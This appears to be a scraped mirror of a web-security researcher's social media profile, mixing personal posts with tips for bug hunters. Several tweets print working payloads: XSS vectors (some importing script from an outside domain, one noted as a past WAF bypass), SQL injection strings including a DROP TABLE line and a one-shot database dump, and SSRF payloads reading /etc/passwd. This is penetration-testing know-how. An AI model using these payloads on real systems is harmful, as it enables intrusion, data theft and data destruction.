Rodolfo Assis
@RodoAssis
Followers
9,759
Following
113
Media
502
Statuses
2,911
That #XSS guy. @BRuteLogic @KN0X55
Brazil 🇧🇷
Joined March 2018
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
Colorado
• 147756 Tweets
Notre Dame
• 123527 Tweets
#AEWAllOut
• 91628 Tweets
Kentucky
• 77587 Tweets
#仮面ライダーガヴ
• 67966 Tweets
The Weeknd
• 66592 Tweets
Nebraska
• 47099 Tweets
Carti
• 34804 Tweets
Abel
• 32718 Tweets
T-岡田
• 29708 Tweets
Talleres
• 29584 Tweets
Tennessee
• 28208 Tweets
#KPOPMASTERZinBANGKOK2024
• 23959 Tweets
Skullduggery
• 21592 Tweets
Oregon
• 19265 Tweets
#InternationalLiteracyDay
• 19173 Tweets
Bama
• 18617 Tweets
Willow
• 17446 Tweets
ショウマ
• 16311 Tweets
BOSSNOEUL TBNW Q6
• 14838 Tweets
NC State
• 14496 Tweets
Herrera
• 14046 Tweets
Deion
• 11346 Tweets
Danielson
• 11327 Tweets
Ospreay
• 10358 Tweets
設営完了
• 10257 Tweets
Pinned Tweet
I don't think that watching/reading
#hacking
tutorials and collecting BB tips in Twitter or any other social media will make you UNDERSTAND what you are doing and why that happens.
Build a solid foundation with PROGRAMMING, NETWORKING, PROTOCOLS and OPERATING SYSTEMS first.
18
67
412
The very first skill you need to be a good hacker is to be able to find things by yourself.
Be good at searching for info & analyzing it so you can get the best resources on any subject.
Your mind is like an axe to chop a tree: the sharper it is, the faster it gets job done.
8
110
462
A story I'm really proud of.
After I had learned
#XSS
and retired as
#1
from
@openbugbounty
in 2015,
@kenanistaken
came to me asking if I could teach him.
I said there would be a PRICE.
My price was "you have to do for someone else what I'm about to do for you".
He agreed. 🙂
18
35
394
My son César just born last night!
With just 28 weeks and 1.3 kg he's still struggling to survive.
#BabyBrute
100
3
392
Now you will know where it comes from if you see '-0||' in any
#SQLi
list out there. If you see... 😉
5
126
281
Import from
#XSS
vector itself!
<Img Src=//X55.is OnLoad=import(src)>
X55 domain allows custom JS code after #
6
100
271
Those might be useful some day so I will leave them here.
#XSS
#validation
#bypass
<a href="<svg/onload=" title=1>alert(1)"
<a href="</script><svg/onload=" title=1>alert(1)"
8
83
268
7th anniversary of
@brutelogic
!
Today 7 years ago I've decided to go to Twitter to share what I have been learning about
#hacking
and
#infosec
.
My life has changed dramatically since then and I was able to make a positive impact to many in this community.
Thank you all! 😀
20
21
260
Javascript://%E2%80%A9alert(1)
Just an alternative to %250A or %250D against some security/validation filter in this classical DOM-based
#XSS
.
#XSScheatSheet
#unlockBrute
4
87
249
It seems the new PHP 8 treat MySQL error msgs as "fatal errors" not shown anymore in regular MySQL injection triggering. How to test for it:
Number Input
?id=0.or-1%23
String Input
?s='or-1%23
If it returns the 1st regular result of the page or more than 1 result, bingo!
#SQLi
11
78
230
I prefer to be a good person than to be a good hacker.
1000 times.
8
18
221
Bootstrap
#XSS
v4.0.0, 4.1.0 & 4.1.1
<Brute Data-Spy=scroll
Data-Target='<Svg OnLoad=(confirm)(1)>'>
No user interaction.
#unlockBrute
1
71
208
Do you want to easily
#hack
something but has not idea what to do?
Start by using the following magic string in username and password fields!
/1#\
Check the full reference below.
#hack2learn
#CyberSecurity
#WebHacking
#SQLi
1
33
209
I've put a lot of work on this to make it the greatest so far.
Different from what you can find out there for free, this one has clear directions on how to use vectors/techniques, up-to-date information and tricks that only Brute can bring to you! 😉
3
37
179
While I write the next post, take a look at this one if you didn't do it already. 😉
3
69
172
I just published Thinking About Simple SQL Injections
2
56
163
"New" bypass. That happens all the time with my work and I rarely get mentioned. They can't even understand what happens to change the payload disguising the copy a little bit better. 🤨
5
26
170
This
#XSS
vector was used by some lucky guys to bypass CloudFlare WAF not so long ago. Fixed now, sorry! 😉
<svg onx=() onload=(confirm)(1)>
#TheArtofBypass
booklet is on my plans for this year too.
2
29
151
To be a real good hacker you must be smart enough to do to a couple of things IMHO:
1. Be able to find the info you need by yourself;
2. Be able to correctly evaluate technical content:
3. Be able to find and fill the gaps in current hacking knowledge.
#hack2learn
3
24
142
=> Vulnerability
LFR via SSRF
=> Scenario
PHP file_get_contents() with filter_var() + FILTER_VALIDATE_URL + FILTER_FLAG_QUERY_REQUIRED
=> Payload
file:///etc/?/../passwd
2
44
142
file:///etc/passwd
A known FILE DISCLOSURE vector, right?
But then the developer use a simple full URL validation requiring query string and boom, you get the bots and kiddies right out of the game!
Check out why:
1
48
128
Tomorrow is a very special date to me:
@brutelogic
's 10th anniversary
Sadly, I couldn't prepare anything special to share and celebrate that milestone.
But I hope to bring some ideas to life until the end of this year labeled as "Brute Logic 10th Year".
Wish me luck! 🙂
21
6
123
#SQLi
Poem
=Injecting+SQL+every+night';
/*Let's*/DROP+TABLE+users;
/*If+you+can't+code+it+right*/
SELECT+"a+new+job+loser!";#
Just found that in my old stuff! 😆
1
20
117
When sharing knowledge:
- Be patient and supportive
- Be clear in your directions
- Do not assume that people knows what you know.
6
25
118
I just want to inform people who follow my work, here or in
@brutelogic
@knoxss_me
etc that although I'm not that much active as I used to be, I'm still working (somehow) in the background.
It's just because things got really hard here taking care of these kids! 😍
8
1
112
It's just a new side project that was born, I didn't even added https to it.
But I have ambitious ideas about it, both for
@knoxss_me
and another project.
The idea is to make better PoCs for everyone! Check it out:
<Img Src=//X55.is OnError=import(src)>
1
25
111
I'm suffering from severe mental health issues in the last years, it's being hard for me to get back online with new stuff.
If anyone is willing to help me, please do it by spreading the word about my blog and booklet and specially my underrated online tool
@KN0X55
Thank you.
30
31
112
#XSS
Test Methodology 101
Test every entry point with "XSS" in this command line for reflection, one at a time. URL fragment one will work only in browser.
$ curl --data "p1=XSS&p2=XSS&pn=XSS" "
https://domain/XSS/XSS/XSS?p1=XSS&p2=XSS&pn=XSS#XSS"
2
35
107
I didn't know that so I'm sharing this no matter easy and straightforward it might be... 😀
You can use a WILDCARD (*) to check all URLs of domain or folder of an app in Wayback Machine!
Like (encoding of %2A here is just because Twitter link requires)
7
23
107
Not sure if this is well known (single slash after scheme & double encoding in path) but for PHP curl-based
#SSRF
to achieve Local File Read (LFR) this is possible:
File:%2Fetc%252Fpasswd
0
28
100
I think guys in my position wonder how one can be able to help people one by one with my current level of attention.
I can only say there's a kind of *JOY* when you see people learning from you or show gratitude for the work you do.
Thank you all for all the love I get! 😊🙏🏾
5
1
97
I mind my own business.
It means I'm more interested on being a BETTER ME than in mocking people down.
It means I'm more concerned about doing a BETTER JOB than in trying to make someone else's job look bad.
It means I'm sensible enough to
#RESPECT
other people and their work.
1
8
96
My son and my hope in a better future.
Thank you all for your priceless support when he was at hospital.
He's very healthy and extremely lovely right now! ☺️
6
0
94
I didn't want to rescue any more animal because we are living a very sacrificing life and we can barely handle our situation here.
But after WEEKS passing and seeing him dying slowly, I was expecting to not see him anymore. 😔
Today I couldn't resist. I have to try to save him.
9
4
92
If You Want To Be Successful
STAY AWAY!
From the crowds:
If everyone is going one way, run to the opposite direction.
From other's agenda:
Everyone do their stuff for a purpose and it's to help them, not you.
From dependency:
Learn by yourself as much as you can.
4
20
91
I wish people could understand how difficult is for me to do all I do (online)!
- 4 Twitter + 1 Facebook accounts
- 1 online tool + customer service 24/7
- 1 blog + 1 cheat sheet
- Research + content creation
- Chats +
#XSS
consulting every day
😎
7
0
88
Me &
#babyBrute
enjoying some time out. He's about to complete 10 months next Thursday (time flies!).
6
0
86
#MySQL
#SQLi
#PoC
Shortest DB DIOS - Dump In One Shot
#BugBounty
#Pentest
Make_Set(7,@:=0,(Select-1.From(Information_Schema.Columns)Where@:=Make_Set(63,@,0xa,Table_Schema,Table_Name,Column_Name)),@)
Usage Example:
?id=0 Union Select 1, DIOS, 1--+
0
22
86
After 00:01 UTC November 25th the current version of my
#XSS
ebook will have an awesome $9.95 USD special price! 🤩
#BlackFriday
#CyberMonday
Don't miss that offer!
5
22
82
')})/alert(1)(()=>{k://
That's just one of the EXCLUSIVE payloads you find only here in my Cheat Sheet! 😉👇🏾
Just $9.95 USD!
#BlackFriday
#CyberMonday
2
19
81
Today is one of the most important days of my life!
My sons just started their education journey. There's a long road ahead.
I love my sons.
12
0
79